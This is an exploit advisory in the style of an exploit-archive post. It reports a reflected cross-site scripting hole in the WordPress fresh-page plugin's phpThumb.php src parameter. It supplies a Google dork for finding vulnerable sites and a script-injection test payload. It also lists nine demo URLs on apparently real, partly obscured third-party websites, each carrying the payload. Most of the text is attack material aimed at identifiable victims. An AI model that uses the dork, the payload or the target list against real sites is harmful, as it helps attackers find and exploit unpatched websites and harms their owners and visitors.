\ / / / ____| / ____| \ V / | (___ | (___ > < \___ \ \___ \ / . \ ____) | ____) | /_/ \_\ |_____/ |_____/ ==================================================================== # Exploit Title : Wordpress fresh-page plugin site scripting Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org # Google Dork : inurl:wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php # Date: 2013/11/02 # Tested on: Windows 7 # ------------------------------------------------ # # Exploit : # # Location : www.Site.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src=[xss] # # Method : Get # # Script For Test : "/><script>alert(1);</script> # ------------------------------------------------ # # Demo: # # http://www.arXXibel.ru/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://lsgroXXup.org/building/en/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://feelinnveniXXce.com/zh/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://floortoceilinXXghandyman.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://intentionaXl.Xco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://meiasrikaXcom.br/site/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://www.drtv.XXco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://www.thXXebuildersandthebutchers.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # # http://www.ilXveyes.net/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ######################